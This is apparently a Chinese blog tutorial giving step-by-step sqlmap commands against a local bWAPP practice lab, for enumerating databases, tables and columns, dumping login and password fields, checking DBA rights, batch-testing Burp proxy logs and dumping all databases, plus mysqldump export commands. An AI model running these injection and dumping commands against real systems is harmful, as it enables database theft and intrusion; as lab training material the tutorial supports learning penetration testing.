使用sqlmap获取数据步骤

wutiangui2023-10-05 20:29

文章目录

1.使用sqlmap获取所有数据库

--dbs

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch --dbs

2.使用sqlmap获取当前连接数据库

--current-db

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch --current-db

3.使用sqlmap获取当前数据库下所有表名

-D bwapp --tables

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch -D bwapp --tables

4.使用sqlmap获取当前数据库下某个表下所有列名

-D bwapp -T users --column

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch -D bwapp -T users --column

5.使用sqlmap获取当前数据库下某个表下指定字段的数据

-D bwapp -T users --dump -C "login,password"

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch -D bwapp -T users --dump -C "login,password

6.测试当前用户是否是管理员

--is-dba

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" --is-dba

7.使用burp+sqlmap批量检测

首先打开burp的project options

依次点击Misc,勾选Logging下Proxy的requests

然后起一个保持文件,比如sqlmap.log

接着开启代理,随意访问,比如访问刚才的靶场SQL Injection (GET/Select)

然后它会自动把访问数据包追加到log文件中

接着我们使用sqlmap可以对log里的所有数据进行检测

python sqlmap.py -l G:\资料\sqlmap.log --batch

8.脱库命令

sqlmap脱库方法 --dump-all

可以自动扫描出当前电脑所装所有数据库数据

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch --dump-all

mysql脱库方法

导出全部数据库

mysqldump -uroot -proot -A > allDatabase.sql

导出全部表空间信息

mysqldump -uroot -proot -A -Y > allTable.sql

9.sqlmap对post包的检测

--data="movie=1&action=go"

--data后面是post包最下面的参数

python sqlmap.py -u "http://127.0.0.1:9004/sqli_13.php" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" --data="movie=1&action=go" --batch

相关推荐
ManageEngineITSM2 小时前
技术的秩序:IT资产与配置管理的现代重构
大数据·运维·数据库·重构·工单系统
档案宝档案管理5 小时前
档案宝:企业合同档案管理的“安全保险箱”与“效率加速器”
大数据·数据库·人工智能·安全·档案·档案管理
wangjialelele5 小时前
mysql库操作二
数据库·mysql
Chloeis Syntax5 小时前
MySQL初阶学习日记(1)--- 数据库的基本操作
数据库·学习·mysql
workflower6 小时前
FDD(Feature Driven Development)特征驱动开发
大数据·数据库·驱动开发·需求分析·个人开发
韩立学长7 小时前
基于Springboot的旧物公益捐赠管理系统3726v22v(程序、源码、数据库、调试部署方案及开发环境)系统界面展示及获取方式置于文档末尾,可供参考。
数据库·spring boot·后端
苦学编程的谢7 小时前
Redis_4_常见命令(完)+认识数据类型和编码方式
数据库·redis·缓存
小光学长7 小时前
基于Vue的儿童手工创意店管理系统as8celp7(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
前端·数据库·vue.js
小光学长7 小时前
基于Vue的地铁综合服务管理系统7949eg04(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
前端·数据库·vue.js
热门推荐
01GitHub 镜像站点02综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件03UV安装并设置国内源04npm使用国内淘宝镜像的方法05Linux下V2Ray安装配置指南06BongoCat - 跨平台键盘猫动画工具07《大数据技术原理与应用》实验报告三 熟悉HBase常用操作08安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)09NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南10jdk21下载、安装(Windows、Linux、macOS)